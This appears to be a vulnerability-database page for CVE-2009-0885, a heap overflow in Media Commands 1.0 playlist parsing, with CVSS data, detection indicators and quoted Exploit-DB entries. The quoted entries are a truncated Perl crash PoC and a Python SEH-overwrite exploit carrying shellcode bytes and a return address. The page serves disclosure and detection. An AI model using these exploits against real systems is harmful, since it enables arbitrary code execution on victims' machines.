CVE-2009-0885
published 2009-03-12CVE-2009-0885: Multiple heap-based buffer overflows in Media Commands 1.0 allow remote attackers to execute arbitrary code or cause a denial of service (application crash)…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
8.75%
94.5th percentile
Multiple heap-based buffer overflows in Media Commands 1.0 allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a long string in a (1) M3U, (2) M3l, (3) TXT, and (4) LRC playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mediacommands | media_commands | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49
bytes↗
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49
- →Trigger pattern: malicious playlist files (.m3u, .m3l, .txt, .lrc) containing a long string prefixed with 'http://' followed by ~5000 'A' characters cause a heap overflow in Media Commands 1.0 ↗
- →SEH-based exploit uses a buffer of exactly 4103 bytes of 'A' padding before overwriting the SEH chain in a .m3u file ↗
- →SEH overwrite exploit targets pop/pop/ret gadget in msacm32.drv at address 0x722FC635; monitor for SEH chain corruption pointing into this module ↗
- →Shellcode stub begins with the encoder stub bytes EB 03 59 EB 05 E8 F8 FF FF FF; scan playlist file content for this byte sequence ↗
- →Both PoC and SEH exploit write crafted payload files named with the pattern 'hakxer.<ext>' or 'exploit.m3u'; alert on creation of unusually large playlist files containing high-entropy or NOP-sled content ↗
- ·The PoC (exploit-db 8135) is a crash/DoS proof-of-concept only; the shellcode variable is named '$CoDe' but the file write uses '$c0de' (undefined), so the written file contains only the crash string and no shellcode — actual code execution requires the corrected SEH exploit (exploit-db 8137) ↗
- ·The SEH exploit was tested specifically on Windows XP Pro SP2 French; the pop/pop/ret gadget address (0x722FC635 in msacm32.drv) is OS/patch-level specific and will differ on other builds ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)
exploitdb·2009-03-02
CVE-2009-0885 Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)
Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)
---
#!usr/bin/perl #
# Discovered & Coded by : Hakxer #
# Media Commands (M3U,M3l,TXT,LRC Files) Crash PoC #
# Greetz : Allah , ProViDoR , Egyptian x Hacker #
# Team : Egy coders Team #
# Download/http://www.mediacommands.com/download.html#
# Description : #
# Import Hakxer.[Ext] Into program ... #
# Program Get Crashed ;) #
######################################################
my $crash="http://"."A" x 5000;
my $CoDe=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x77\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x79\x79\x6b\x4c\x70".
"\x6a\x78\x6b\x52\x6d\x4
Exploit-DB
Media Commands - '.m3u' Local Overwrite (SEH)
exploitdb·2009-03-02
CVE-2009-0885 Media Commands - '.m3u' Local Overwrite (SEH)
Media Commands - '.m3u' Local Overwrite (SEH)
---
#usage: exploit.py
print "**************************************************************************"
print " Media Commands (m3u File) local Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
buff = "\x41" * 4103
next_seh = "\xEB\x06\x90\x90"
seh = "\x35\x2F\xC6\x72" #pop pop ret msacm32.drv
nop = "\x90" * 19
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\
No writeups or analysis indexed.
http://osvdb.org/52346http://secunia.com/advisories/34122http://www.securityfocus.com/bid/33958http://www.securityfocus.com/data/vulnerabilities/exploits/33958-2.pyhttp://www.securityfocus.com/data/vulnerabilities/exploits/33958.pyhttp://www.securityfocus.com/data/vulnerabilities/exploits/33958.rbhttp://www.vupen.com/english/advisories/2009/0583https://exchange.xforce.ibmcloud.com/vulnerabilities/49035https://www.exploit-db.com/exploits/8135http://osvdb.org/52346http://secunia.com/advisories/34122http://www.securityfocus.com/bid/33958http://www.securityfocus.com/data/vulnerabilities/exploits/33958-2.pyhttp://www.securityfocus.com/data/vulnerabilities/exploits/33958.pyhttp://www.securityfocus.com/data/vulnerabilities/exploits/33958.rbhttp://www.vupen.com/english/advisories/2009/0583https://exchange.xforce.ibmcloud.com/vulnerabilities/49035https://www.exploit-db.com/exploits/8135
2009-03-12
Published